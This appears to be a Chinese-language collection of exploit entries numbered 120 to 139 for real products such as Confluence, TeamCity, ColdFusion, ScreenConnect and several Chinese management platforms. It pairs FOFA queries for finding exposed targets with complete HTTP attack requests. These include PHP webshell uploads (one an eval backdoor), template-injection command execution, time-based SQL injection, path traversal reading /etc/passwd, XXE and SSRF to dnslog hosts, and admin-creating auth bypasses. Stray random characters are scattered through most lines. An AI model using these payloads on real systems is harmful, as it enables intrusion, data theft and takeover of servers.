src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456- n! r$ V: s, \+ F; w1 n: b
. W ~1 }8 I# o
2 J' _6 ?+ m+ G) l120. 北京百绰智能S40管理平台导入web.php任意文件上传5 s% h% u0 v1 d( l
CVE-2024-1253
9 S, @, n/ G- w2 ^; m5 W+ a0 @FOFA:title="Smart管理平台"
) u1 p* E4 h* k, S( a2 kPOST /useratte/web.php? HTTP/1.1$ { S# F7 m- y2 A
Host: ip:port
+ f3 M5 ?" ^, ]5 gCookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
/ U) T5 R1 j4 B1 f& X* i _! NUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko( X% U) |# k- Q+ H, W+ P$ X2 v
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
* @. M3 C1 q$ ~: s4 m) r; ~Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
" `3 |: q7 W! K- h, @# n5 MAccept-Encoding: gzip, deflate
" m2 O* Q5 f- u" H" f* ?/ R% N( wContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
" Z* A I7 u7 K0 mContent-Length: 597# R8 i# X( `3 P/ F8 f3 r
Origin: https://ip:port
- N# q. g) X' }2 G' _. X3 cReferer: https://ip:port/sysmanage/licence.php
, d/ \, |2 O" n' C3 R* Z# @Upgrade-Insecure-Requests: 1
5 O3 ]% r- r/ y+ A+ A% Y8 eSec-Fetch-Dest: document& j# v$ N; W) S4 `
Sec-Fetch-Mode: navigate
5 C* G; Q* j, g, g* K' n2 `Sec-Fetch-Site: same-origin) z# }, h) y. f* h, z T/ P
Sec-Fetch-User: ?1
9 ~ ]# ]: ]7 N. V' v6 P/ B7 VTe: trailers6 B+ h+ V$ x& a' ~1 S% X
Connection: close
3 _" N5 A9 G6 \. \, f% c' C
9 [: h$ V. t# I% h# Z' T7 A-----------------------------42328904123665875270630079328
* }. y0 x; C* E" CContent-Disposition: form-data; name="file_upload"; filename="2.php"
' N T" w* _# B) B# uContent-Type: application/octet-stream' Z. k/ m8 d" I+ Z1 r' Z
6 \* `+ @# n9 u. T<?php phpinfo()?>
) s1 G" S5 X4 a( b" k, c9 B-----------------------------42328904123665875270630079328; N% L1 i8 J9 F! {
Content-Disposition: form-data; name="id_type"
/ R, U- x0 v3 S6 |$ K4 X1 o" j; ^, `
1
( J8 \: k2 p( {; d* V-----------------------------42328904123665875270630079328
; b7 M- z3 @% u6 ~$ iContent-Disposition: form-data; name="1_ck"; q* |# k L* S% i; @3 e
% e4 g' L- f6 ~4 h
1_radhttp
6 Z3 e6 o q4 k-----------------------------42328904123665875270630079328
0 @" a; r- Q0 yContent-Disposition: form-data; name="mode"
: h5 w; j7 Z( j* I3 J# D4 m7 l: [7 C) Q: Y" [* c5 F% Q
import
& V; W7 H+ o3 v# s3 [-----------------------------42328904123665875270630079328
* _: n' l& E" T; v% d( s& S" d9 S! z/ @( ]) e% b& b; R0 c, u1 e
% K( n* r$ G& y: c, @$ V$ a文件路径/upload/2.php% }" x8 [* {, G; c E
% g5 Z' w! T7 x0 u ~121. 北京百绰智能S42管理平台userattestation.php任意文件上传! f# s# G' N ^3 o+ x
CVE-2024-19186 v# T" f7 B! I$ p4 N& `
FOFA:title="Smart管理平台"! L/ ~. R$ D- v4 f" q" A' @
POST /useratte/userattestation.php HTTP/1.1% v7 L8 M5 F; K# o; m2 B
Host: 192.168.40.130:84439 C% k# ^' N9 o& u1 ~9 F. o
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
7 T9 s& U4 y2 V' _1 k4 \* PUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
! ]- |2 `4 j2 \* t9 T: DAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8: d- c2 M/ a1 v1 [: x: ~" f$ _" y
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
( x; X4 B# U/ Q: vAccept-Encoding: gzip, deflate; z: n; e* B+ n. H: }% y
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
& ~% r# W% W3 D; DContent-Length: 592
# h! ?8 ~# R0 z5 r; eOrigin: https://192.168.40.130:8443* U- P$ K2 b+ h! j1 m# Q# W
Upgrade-Insecure-Requests: 1 R; {+ w4 \; A6 h. W9 Q
Sec-Fetch-Dest: document
( s% m% ^# ]1 c% O( ~Sec-Fetch-Mode: navigate
0 F) Y' @0 W& d8 \, q& b; eSec-Fetch-Site: same-origin
1 r% d9 ^ Z J! h- YSec-Fetch-User: ?1
& z8 m9 g/ I3 S. m6 BTe: trailers
, W1 _3 j7 a9 zConnection: close
. h' J1 s- M, K5 ?8 j0 S
0 `3 q. E4 ?6 f-----------------------------423289041236658752706300793288 M/ e0 x( A( O, x8 P1 c+ B& \
Content-Disposition: form-data; name="web_img"; filename="1.php"
, ]! \' ?! z2 I# R8 EContent-Type: application/octet-stream3 e% E0 | E% i) v3 {7 |, j& k7 [
8 r1 T2 J' _, f5 @9 \, g# C& y
<?php phpinfo();?>
% ^) ~8 o4 J: _-----------------------------42328904123665875270630079328 H9 \; \: A/ v# r
Content-Disposition: form-data; name="id_type"
( S( C7 t( _5 ?" h0 B4 r& z, |" C
$ Q/ K( g3 L2 D% t1
. |; w+ Z; F1 e. O7 R6 i-----------------------------42328904123665875270630079328
5 g8 v: E$ E# D! ?1 AContent-Disposition: form-data; name="1_ck"
* U. f" {+ b% N- T; `9 f- M6 v/ N2 C# D
1_radhttp& \# w+ ^- X/ k
-----------------------------42328904123665875270630079328
* R4 a0 T, n ]7 q% L8 yContent-Disposition: form-data; name="hidwel"6 i4 y$ g9 }5 E" N; g0 o
/ G3 J, K4 H& s8 I
set
' ]0 o, d) \! _5 U-----------------------------42328904123665875270630079328
' |, K0 ^2 Q; ?5 x5 N4 o8 h: b* x. @4 _+ @
3 K6 U- f |' j" R
boot/web/upload/weblogo/1.php
- g) k8 s" W" M: b0 _" v* T2 P5 @2 @# T: T3 H! a, H
122. 北京百绰智能s200管理平台/importexport.php sql注入, \7 l: u# ]& ?
CVE-2024-27718FOFA:title="Smart管理平台"! ]. q- Y) e* s- O7 e
其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()4 v7 m% \0 A; }9 X- l' s6 a
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
! v$ G" m+ I+ V8 B, d& o% N: zHost: x.x.x.x2 S7 i4 r' E0 E( \! K" |1 _* m
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0# W" p. P6 q; ?' M' d. U; M6 f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.04 f% [$ h; l; d: t6 R6 q9 `5 B7 |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8. d8 u% |4 N1 P: q; J" [
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% `: M1 i& |. N" J4 o9 ?
Accept-Encoding: gzip, deflate, br
9 s/ R+ z' W) X+ g3 BUpgrade-Insecure-Requests: 1# r# s1 @ u! m. o# p
Sec-Fetch-Dest: document
$ e7 F2 ]4 c9 ~, Q' `& USec-Fetch-Mode: navigate
! ]1 ~* N# g) zSec-Fetch-Site: none8 q4 n, I7 F# c5 u" m* A+ o! k
Sec-Fetch-User: ?1$ f) n! b4 i/ o0 X" X: q
Te: trailers
& ^- \& V& \8 |- r" `, [Connection: close
! H9 B; y+ L8 a
2 T0 G1 s: @# ?9 D/ e' [- u! D# K; R7 [+ D: a& L F4 r* {& w
123. Atlassian Confluence 模板注入代码执行
6 `3 P# ]+ C% P1 y2 IFOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"& ^% l, K+ C7 i9 }" R
POST /template/aui/text-inline.vm HTTP/1.1
- z; f% N* A$ d& o0 l8 _$ UHost: localhost:8090& k7 m# h, v! Q8 F. }! I7 v
Accept-Encoding: gzip, deflate, br5 S) T" v( I) q* N
Accept: */*/ N( Q3 y9 K6 T. D3 c
Accept-Language: en-US;q=0.9,en;q=0.8" K6 s, l7 }3 {+ R1 x( g3 F9 W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36$ A) K' N6 M; P2 |& m, T' l( b
Connection: close
L/ G- P. E* _Content-Type: application/x-www-form-urlencoded5 H- `2 Z* ?* J( f6 C' d) Q
( r8 |. H' K7 ~+ f4 U* ?7 \7 @0 Z
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))% Z0 l% V, L1 D! r" x ~% q
+ X9 d; [, _( S0 @6 W
. D& n$ p/ ^1 Y, L# W
124. 湖南建研工程质量检测系统任意文件上传
# b$ M; U9 \( GFOFA:body="/Content/Theme/Standard/webSite/login.css"
3 V( Z2 ^( Q1 X1 J7 j0 ~POST /Scripts/admintool?type=updatefile HTTP/1.1
$ d$ N# N2 m6 X5 g2 l5 LHost: 192.168.40.130:8282
2 |# [: f) L+ A3 z9 g1 zUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.365 }/ ?2 J2 [0 i* U4 b9 Y8 |
Content-Length: 72
. ^7 t3 J8 G/ L$ P5 j+ {Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8- F, _; W: B9 x; V7 M6 l
Accept-Encoding: gzip, deflate, br
. X4 J1 w4 E5 H8 ?# t& u6 }Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
" Q2 y% f6 ]. w0 g' j% K! p- gConnection: close
& j+ X; D; P2 E* s) f% U4 ?Content-Type: application/x-www-form-urlencoded
) \3 Z9 B4 g& `) ?, Q( J& X6 Q" j: L- M7 R/ I$ L+ G# u7 l) e
filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
( j4 H) u* z+ N' `# a% l2 O; l. A/ A' J
3 n/ s7 L3 {! x) O1 e, yhttp://192.168.40.130:8282/Scripts/abcgcg.aspx* D" e) O% b5 M5 H$ J) V
4 O" [1 d3 k R; A' n125. ConnectWise ScreenConnect身份验证绕过1 T/ ~& d+ L3 `4 g0 f
CVE-2024-1709+ T( ]- x0 g. @- s8 N) `+ [1 g
FOFA:icon_hash="-82958153"
2 M! B/ Y) c! ^$ j0 Fhttps://github.com/watchtowrlabs ... bypass-add-user-poc
3 Z$ T; r- a# ]. ~6 R8 Y( I1 [+ w9 n; G
9 q7 S0 X& N6 s$ L4 c3 G
使用方法
$ w- N7 }' v; @' q3 Rpython watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!& {1 B1 f( u' K- j# s6 W% V
. U; Y% r t6 U$ p. r7 \% h* c# G' ^
创建好用户后直接登录后台,可以执行系统命令。' Z; g, O1 p( X
, l1 r9 w& I/ V- E& B/ X; Y126. Aiohttp 路径遍历 W- v0 D( n j& p
FOFA:title=="ComfyUI"
/ W5 I- t7 W1 J2 `# x' eGET /static/../../../../../etc/passwd HTTP/1.1
5 Z) S! K6 X1 A; u5 THost: x.x.x.x
; I. B# A6 p) V5 A% a* m. R+ NUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36: K5 V) x0 d5 T' G/ f! U) _! k2 b
Connection: close
* ?6 E" E3 w" z# O9 I( m% }6 e3 {( |Accept: */*4 `1 s( i4 R" h6 D. F6 O
Accept-Language: en: V+ Q$ y& J2 d }
Accept-Encoding: gzip
: g- a* `2 a$ l; F
% V! a' Y8 ]( n& p; J& U* e1 ?" ]' o4 O/ V! c
127. 广联达Linkworks DataExchange.ashx XXE5 ^6 }' Y$ C& ^! L( e
FOFA:body="Services/Identification/login.ashx" ' a$ y1 A) _5 `' C2 O: u& X. B# ?
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
! S4 [8 P: R3 B/ u" c$ UHost: 192.168.40.130:8888
6 y4 v' e$ q3 j$ ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.363 c6 X8 f! x# s. a1 f7 K
Content-Length: 415+ a& Y# y. x+ f0 a) T# q$ D
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
" w6 o( h) n4 R' E) }% u CAccept-Encoding: gzip, deflate
' ~' [ z9 h8 E: _$ R5 zAccept-Language: zh-CN,zh;q=0.9
/ a! h. t1 S8 BConnection: close
5 B: k" X, g; u/ e$ e r2 `& e; e4 LContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0& C. y) r3 X$ Q o! c* e2 ~. o
Purpose: prefetch
p- a# _9 f4 a' ]Sec-Purpose: prefetch;prerender* B3 M+ `( W3 [" s) @
' Y% e( b6 E; s- x- H------WebKitFormBoundaryJGgV5l5ta05yAIe0
4 e+ r2 O, N8 BContent-Disposition: form-data;name="SystemName"
7 Z" V( J0 v5 y4 c5 C
' ?( ?) U$ ~ i5 bBIM
. P2 s2 t" ]9 I5 w9 {( X: u------WebKitFormBoundaryJGgV5l5ta05yAIe0( P9 s. p5 C% D; a
Content-Disposition: form-data;name="Params"
" @ |& a# w" ~ |) S& A) oContent-Type: text/plain7 O% R- q: i8 ^# B4 N. z, q9 x
- G: j: a) Z) H) g" s+ {3 ?' [
<?xml version="1.0" encoding="UTF-8"?>- s9 [- {7 A+ M5 G# a' S
<!DOCTYPE test [$ q+ K$ \7 L3 v5 Z/ R8 t
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
0 [" g6 o' Z) _! A+ P# t$ t]: d1 ?" l" M& F# h! ^
>9 s1 w2 B; Z0 z
<test>&t;</test>8 d# l- O; }* @- m6 W
------WebKitFormBoundaryJGgV5l5ta05yAIe0--
. C2 d- j1 T- s6 o d& r; V' i0 ]* ?; N e: j9 _
a- g$ E+ B9 F4 \/ i% Z \& n+ x8 t, _$ K7 Y
128. Adobe ColdFusion 反序列化
( B1 @- D9 |, c$ [; l! g" @8 `CVE-2023-38203
" p4 q; `9 S! B4 T {( o1 L; W& p1 ZAdobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)
7 m- d; Y' U. B' ^9 `0 v. N" I8 k" MFOFA:app="Adobe-ColdFusion"# Z/ S0 |) f* G9 o
PAYLOAD
! I- X- e9 p' c" E" N6 @8 g6 h( i# y/ t3 O/ v8 d3 ], x
129. Adobe ColdFusion 任意文件读取3 V& Q. k( a7 k
CVE-2024-20767
2 G' h6 o) {- `' P- L0 {FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
" [3 B0 y$ l1 {. z* k; _第一步,获取uuid
: I* I% K4 j1 j: M) E) }GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
: L8 c/ T! Y3 t& SHost: x.x.x.x
( ^, P# V' g1 m) \User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36! U- O$ V @; M- K3 h/ w
Accept: */*
2 S/ d! I0 Y3 X& yAccept-Encoding: gzip, deflate
4 K) \& C- [, M! B5 LConnection: close" U9 g8 L3 F- }
1 m% x* _7 V' A' s7 E- W5 m0 Q! o+ R" H% _5 }- N$ _
第二步,读取/etc/passwd文件" m. T7 C& L0 o" `) P" H# H: U
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1% Q$ S' y5 v& n! G' q' V
Host: x.x.x.x( |& S* S9 }) ~* d: m" ?0 z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
" l* f9 M( e1 ~/ g8 U4 N/ D/ _/ MAccept: */*7 h1 C( ~9 a) l
Accept-Encoding: gzip, deflate
9 l9 N# \2 }) c# M' lConnection: close
. A) ?( r S, p* _4 p( s# Z' Uuuid: 85f60018-a654-4410-a783-f81cbd5000b98 R9 M/ P4 Q0 P5 e- X+ l2 c
4 i" X* W+ z6 ?- U- l2 B+ v" ^) q8 b4 I: i% E% k" s# @
130. Laykefu客服系统任意文件上传0 `+ E! G$ v3 ]8 G# a
FOFA:icon_hash="-334624619"6 V5 [5 c. z4 z9 r% T5 v( H. n' ?$ S
POST /admin/users/upavatar.html HTTP/1.1& s- K- f4 P2 m: H( C% a9 O
Host: 127.0.0.1( w+ }/ y" z" V. Q2 C* M( L* J, H
Accept: application/json, text/javascript, */*; q=0.01. |& }7 w: `1 i z- h
X-Requested-With: XMLHttpRequest3 d2 @3 |) g2 ~ ^0 R
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.268 x$ j' Z" {" P+ [* E4 F
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR) ]1 |4 o0 ^' o% v# ?( T
Accept-Encoding: gzip, deflate- ~: E( ^# v& F! ^$ A
Accept-Language: zh-CN,zh;q=0.9
& D/ b/ g' T/ m4 x p4 N. @Cookie: user_name=1; user_id=3" L- b" N, H9 U0 N" p. _
Connection: close' h6 }5 W- t3 j& S5 R
' T% X: S6 u6 n' y/ ^
------WebKitFormBoundary3OCVBiwBVsNuB2kR
" c& Z% z) n$ C4 E/ i# SContent-Disposition: form-data; name="file"; filename="1.php"
$ \+ l& @$ |) w1 s8 L! bContent-Type: image/png
x6 I" T& m5 B4 w
$ u2 Y7 n$ P! y+ i9 v9 p<?php phpinfo();@eval($_POST['sec']);?>; `1 m1 Y- ]( M& U5 x( S; B+ _) y
------WebKitFormBoundary3OCVBiwBVsNuB2kR--
+ M: g8 C1 M+ W# j. _, F: x V( u% ?% v! X. s- A$ `3 `; U
+ C. L+ z' W N( v) H. n
131. Mini-Tmall <=20231017 SQL注入, V8 p! ^( w v7 {8 z, X
FOFA:icon_hash="-2087517259"3 _, ~" ^* E' f3 c' r t
后台地址:http://localhost:8080/tmall/admin
6 w3 o) c+ ^ X% h) n. a4 Yhttp://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0); j q: @2 R; c
3 V) M( A0 l' t
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
: g. m2 R U3 R8 o+ UCVE-2024-27198
! J3 r( X2 {' x8 f7 |FOFA:body="Log in to TeamCity"
5 j) R! { m u7 b8 n& J- P! o& J) f. F) cPOST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
0 g! E7 u& O7 R2 JHost: 192.168.40.130:8111. W7 r6 _6 N. x% R. ?/ Q" L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36; b8 v# I$ j. u3 {1 Y
Accept: */*
" s) A3 v( j- o* rContent-Type: application/json' f" l6 L6 g* l, X1 N$ }
Accept-Encoding: gzip, deflate: b* b G' w& {4 ?
+ n2 F; O& K! u: r# y; m
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}5 ^9 V/ e4 h- T# Q
" S' r6 c1 t# ?/ q* D' t/ d
) H) a6 X1 P9 O+ H# s
CVE-2024-27199
4 [; f1 d3 {3 }5 l3 ?- @. L/res/../admin/diagnostic.jsp; j& N& K# w+ t1 q6 s5 F
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/ s. x3 w% Y6 v' R/update/../admin/diagnostic.jsp
! k8 E2 z/ ^3 H$ b- T, _2 b& L2 I1 k, s6 p
% D! }$ X$ l# r. J
CVE-2024-27198-RCE.py) [9 D E# Z& X6 ` y: L7 d1 z0 F1 \
/ Z/ M l7 t- L# }1 ~133. H5 云商城 file.php 文件上传2 V7 }; C0 m% X! f
FOFA:body="/public/qbsp.php". Z1 A+ d$ V) `% p0 W
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
1 k- B$ Q" z$ G" ]Host: your-ip
7 H. m* M! f' `- N* h+ wUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36$ r1 \: N9 O, {! J- \
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx& G u4 J2 M% j2 r
2 j9 y9 f% B* F; E
------WebKitFormBoundaryFQqYtrIWb8iBxUCx& ^& K, \1 d7 r/ L. e. J) u3 s
Content-Disposition: form-data; name="file"; filename="rce.php"
$ J! d! Z, w( ^! I7 P6 LContent-Type: application/octet-stream, R! {% b/ m- n; C \; n, e4 K
0 h9 r5 F; N/ E, T$ G<?php system("cat /etc/passwd");unlink(__FILE__);?>7 F. A6 V( \: ]8 ?7 v1 _
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--8 {* h P1 o; C7 j* j7 j) V$ i4 L2 f. T
4 `! h5 r" {" ~0 e! b* p% t" I' m5 d$ H/ _6 i
* I& Y8 G- ^; d8 {) V9 K/ R' k; B
134. 网康NS-ASG应用安全网关index.php sql注入: Z$ D) _0 V$ |; {" C' |
CVE-2024-2330
2 h* ^% L0 z- H, l- k WNetentsec NS-ASG Application Security Gateway 6.3版本4 {3 z, k) J: {
FOFA:app="网康科技-NS-ASG安全网关"( P) g V0 x' ?' I. z# [
POST /protocol/index.php HTTP/1.1" V2 w5 U& {. m9 G1 P
Host: x.x.x.x
) V t8 F9 |9 X, a: D" S- cCookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de: g# S- i' I/ J9 ^, X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
% S1 [2 Z( S9 `/ A" sAccept: */*4 s: U2 Z i2 h0 p
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2) w: Z! d; Q6 E+ G% p
Accept-Encoding: gzip, deflate
5 f+ i; R- g i2 o/ w2 k/ H5 ^Sec-Fetch-Dest: empty' f9 T2 o3 Y7 [7 T; `8 q3 {4 C
Sec-Fetch-Mode: cors: O, J s; v% Q' t9 [; Q z
Sec-Fetch-Site: same-origin+ s% I5 I5 q) Z* J. X# I% I
Te: trailers3 {. ^5 ?; Y/ g# h/ Q0 I; H
Connection: close
& Z5 p8 h2 t2 w1 I9 uContent-Type: application/x-www-form-urlencoded O" Q* g. c% N) i3 `8 Q( ?- n
Content-Length: 263
( c) g% _: }; W, Y% w) W
$ I+ J7 N9 O: Z9 l" Y! j. tjsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}9 \! {: t' \6 L# [
: T8 Q! g! w; X1 i+ H; I* Z: d; p- _1 L7 K. p
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
4 I7 r7 ^5 j) rCVE-2024-2022" x5 h' r/ q8 @4 }1 s& [
Netentsec NS-ASG Application Security Gateway 6.3版本
$ W4 y( L J7 tFOFA:app="网康科技-NS-ASG安全网关"
6 T, Z- U. U f. e9 I" fGET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1 j6 g; V8 \- ]* K* p/ K
Host: x.x.x.x4 X9 Z$ N8 [+ h& O: }# m0 r/ G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
. n& ]! Y# s& i: J% ~5 a/ OAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
, m& I1 T% w* H1 }1 ?Accept-Encoding: gzip, deflate U# V/ a+ t/ l0 O
Accept-Language: zh-CN,zh;q=0.9
* F" |* a7 u; [Connection: close O" h; p+ C9 I/ m" b* m* N
7 G/ S$ L- k5 W: Z( p# i
+ l. V6 I$ ^, S7 Q; P136. NextChat cors SSRF3 U" T: W6 `; O4 `
CVE-2023-49785
/ a, c& v* v$ cFOFA:title="NextChat"! v$ R* c( A2 C+ {9 o
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
# n; G1 M" g4 T8 c3 w: SHost: x.x.x.x:10000+ H: t, _7 m' I3 H/ j Z
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.361 n! Z' J- p# M$ ~/ R
Connection: close! d" Y% q* k/ _9 h
Accept: */*# ]* a3 N1 F% n/ q3 F: }. }7 Z
Accept-Language: en( t0 U3 {( w: u
Accept-Encoding: gzip
' i2 x5 W" { E, @; g7 c
( R1 [# g& K6 _0 }, v2 K) w; U7 \% T' p3 t) j2 M4 L# G* F! j; H
137. 福建科立迅通信指挥调度平台down_file.php sql注入" |3 R3 C6 R% R7 W8 T L Z
CVE-2024-2620' \; ^, m" Y3 l. A5 }5 u2 I6 o8 O
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"0 B" b7 B' H% \2 H
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
6 v" b0 {# o' u% N. r+ q, LHost: x.x.x.x+ O& f2 b( c# |( G( y, p0 T7 {( u/ x9 t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.09 }8 s+ I% A6 o! P
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
, z1 n5 _- O5 b; IAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 N$ }3 v) \( y0 aAccept-Encoding: gzip, deflate, br) G: V$ s7 z$ Q+ v
Connection: close1 X! S" r) e* _: |, |- R
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
) ~1 ]$ A& b9 L2 M7 M4 K$ n8 TUpgrade-Insecure-Requests: 1
m2 T2 ~( I; [3 k
4 L$ V5 s5 h. f1 F3 z9 `& `, }( ~" e' N
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
( j: V O. L3 K! A/ g7 a2 G1 N! h. XCVE-2024-2621( o$ h3 j6 v/ o# H
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"+ o# }0 S7 O1 A9 e; V
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.18 W+ b: p( c: ]# r
Host: x.x.x.x0 n0 w4 h E6 b {8 v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0; b: r, o; g E7 `2 U. q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
, w# J% v5 \3 F4 c6 [Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% ?' n; V7 j' k7 B, S( f
Accept-Encoding: gzip, deflate, br* p+ L U, R5 M$ [
Connection: close
R% _% \9 @/ `% O% a4 vUpgrade-Insecure-Requests: 1
9 m! v+ J) W3 H& t6 w4 k% [; U [+ ~
1 Y. P) _ @6 h1 H+ S( O
139. 福建科立讯通信指挥调度平台editemedia.php sql注入8 M0 T7 P/ V+ n. z. e. Z" V
CVE-2024-2622( o4 E" t) N. O- U2 `
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台") t' P9 R4 \, k& G) m. E
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
/ B& O9 f! j! W8 e# I% }Host: x.x.x.x/ v6 N) v' b& B( z8 }! n
